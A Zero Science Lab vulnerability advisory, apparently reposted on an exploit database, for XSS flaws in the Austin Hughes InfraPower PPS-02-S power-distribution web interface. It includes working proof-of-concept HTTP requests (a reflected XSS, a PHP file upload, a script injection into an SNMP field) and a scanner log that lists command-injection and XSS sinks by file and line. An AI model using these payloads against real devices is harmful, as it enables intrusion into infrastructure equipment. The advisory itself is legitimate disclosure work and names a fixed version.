InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities Vendor: Austin Hughes Electronics Ltd. Product web page: http://www.austin-hughes.com Affected version: Q213V1 (Firmware: V2395S) Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is a highly efficient cient application for saving not only the IP remote accessories cost, but also the true IP addresses required on the PDU management. Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Linux 2.6.28 (armv5tel) lighttpd/1.4.30-devel-1321 PHP/5.3.9 SQLite/3.7.10 Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5369 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php 27.09.2016 -- ################################################################################# GET /SensorDetails.php?Menu=SST&DeviceID=C100"> HTTP/1.1 ################################################################################# POST /FWUpgrade.php HTTP/1.1 Host: 192.168.0.17 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh Connection: close ------WebKitFormBoundary207OhXVwesC60pdh Content-Disposition: form-data; name="FW"; filename="somefile.php" Content-Type: text/php t00t ------WebKitFormBoundary207OhXVwesC60pdh Content-Disposition: form-data; name="upfile" somefile.php ------WebKitFormBoundary207OhXVwesC60pdh Content-Disposition: form-data; name="ID_Page" Firmware.php?Menu=FRM ------WebKitFormBoundary207OhXVwesC60pdh-- ################################################################################# POST /SNMP.php?Menu=SMP HTTP/1.1 Host: 192.168.0.17 SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)// ################################################################################# lqwrm@zslab:~# lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt ------------------------------------------------- PHP Source Code Security Scanner v0.2 (c) Zero Science Lab - http://www.zeroscience.mk Tue Sep 27 10:35:52 CEST 2016 ------------------------------------------------- Scanning recursively...Done. dball.php: Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' doupgrate.php: Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST' Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST' Line 15: Command Injection in 'system' via '$_POST' Line 16: Command Injection in 'system' via '$_POST' Line 19: Command Injection in 'system' via '$_POST' Firmware.php: Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' Function.php: Line 257: Header Injection in 'header' via '$_SERVER' Line 267: Header Injection in 'header' via '$_SERVER' FWUpgrade.php: Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' index.php: Line 2: Header Injection in 'header' via '$_SERVER' IPSettings.php: Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged. Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged. Line 117: Command Injection in 'exec' via '$IP_setting' Line 117: Command Injection in 'exec' via '$Netmask_setting' Line 123: Command Injection in 'exec' via '$Gateway_setting' ListFile.php: Line 12: PHP File Inclusion in 'fgets' via '$fp' Login.php: Line 151: Command Injection in 'shell_exec' via '$_POST' Ntp.php: Line 46: Command Injection in 'exec' via '$idx' OutletDetails.php: Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row' Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row' Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' PDUStatus.php: Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' production_test1.php: Line 6: Command Injection in 'shell_exec' via '$_POST' Line 45: Command Injection in 'proc_open' via '$_ENV' SensorDetails.php: Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' SensorStatus.php: Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' SNMP.php: Line 41: Command Injection in 'exec' via '$_POST' System.php: Line 54: Header Injection in 'header' via '$_SERVER' Line 64: Header Injection in 'header' via '$_SERVER' Line 99: Command Injection in 'exec' via '$datetime' Line 99: Command Injection in 'exec' via '$datetime' Line 99: Command Injection in 'exec' via '$datetime' Line 99: Command Injection in 'exec' via '$datetime' Line 99: Command Injection in 'exec' via '$datetime' Line 99: Command Injection in 'exec' via '$datetime' Line 185: Command Injection in 'exec' via '$TimeServer' Line 286: Command Injection in 'exec' via '$IP_setting' Line 286: Command Injection in 'exec' via '$Netmask_setting' Line 292: Command Injection in 'exec' via '$Gateway_setting' UploadEXE.php: Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' Line 82: Command Injection in 'popen' via '$_FILES' Line 96: PHP File Inclusion in 'fgets' via '$fp' Line 96: PHP File Inclusion in 'fgets' via '$buffer' WriteRequest.php: Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST' Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' ----------------------------------------------------- Scan finished. Check results in scan_output.txt file. lqwrm@zslab:~# # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-05]